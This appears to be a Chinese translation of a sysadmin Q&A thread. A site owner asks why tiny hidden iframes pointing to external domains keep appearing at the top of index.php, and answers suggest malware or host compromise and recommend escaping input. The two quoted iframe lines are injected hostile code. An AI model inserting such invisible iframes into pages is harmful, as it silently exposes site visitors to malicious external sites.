那些遇到过的问题

插入我网站页面的神秘 html(被黑?)

6 security

两次,我在 index.php 的顶部发现了奇怪的代码。

第一次,是这样的: 

<iframe src="http://ntwportal.com/" width="2" height="4"></iframe>
Run Code Online (Sandbox Code Playgroud)

然后这个:

<iframe src="http://gtwdnsglobe.org/" width="2" height="4"></iframe>
Run Code Online (Sandbox Code Playgroud)

这是怎么回事?我有安全漏洞吗?

拥有 FTP 访问权限(据我所知)的人不会这样做。我最近部署了一个新站点,这种情况仍在发生。

小智 5

应该是病毒吧

http://www.google.com/safebrowsing/diagnostic?site=http://ntwportal.com/&hl=en

HTML 是否也在您的本地计算机上?你可能有病毒插入它。否则,请检查主机的安全性,它可能已被入侵。

小智 3

如果您在页面上接受任何类型的输入,请确保它被正确转义。听起来像是脚本注入的情况。如果您正在寻找更多信息,搜索 SQL 注入、脚本注入或跨站点脚本应该会产生一些结果。

归档时间:

查看次数:

2935 次

最近记录:

15 年,11 月 前
相关归档
可以更改密钥对中的电子邮件地址吗? 177
为什么我可以在我的主目录中删除 root 拥有的文件而不是 root? 45
如何阻止 ansible 将密码写入日志文件? 30
如何保护您的 CA 的私钥? 24
SSH / SSHD - 如何设置最大登录尝试次数? 23
msdeploy 代理服务能否在我们的服务器上打开攻击媒介? 13
任何接近于保护 RHEL 6 的 NSA 指南 12
用于非金融应用的 SSL 证书 3
将 Windows DC、Exchange 放入 DMZ 2
绕过已知 MAC 地址的 VLAN 1
难疑归档
如何使用密码自动进行SSH登录? 592
GIT 作为备份工具 115
如何阻止人们使用我的域发送垃圾邮件? 111
是否可以在 Linux 中为主机名设置别名? 102
嵌套位置 nginx 86
如何查看连接的用户打开VPN服务器? 76
如何在 Windows 7 中挂载 CD/DVD ISO? 71
如何在我的 linux 服务器上编辑另一个用户的 crontab? 64
如何更正 Postfix 的“中继访问被拒绝”? 63
如何获取有关 Linux 中 /proc 中显示的打开管道的更多信息? 61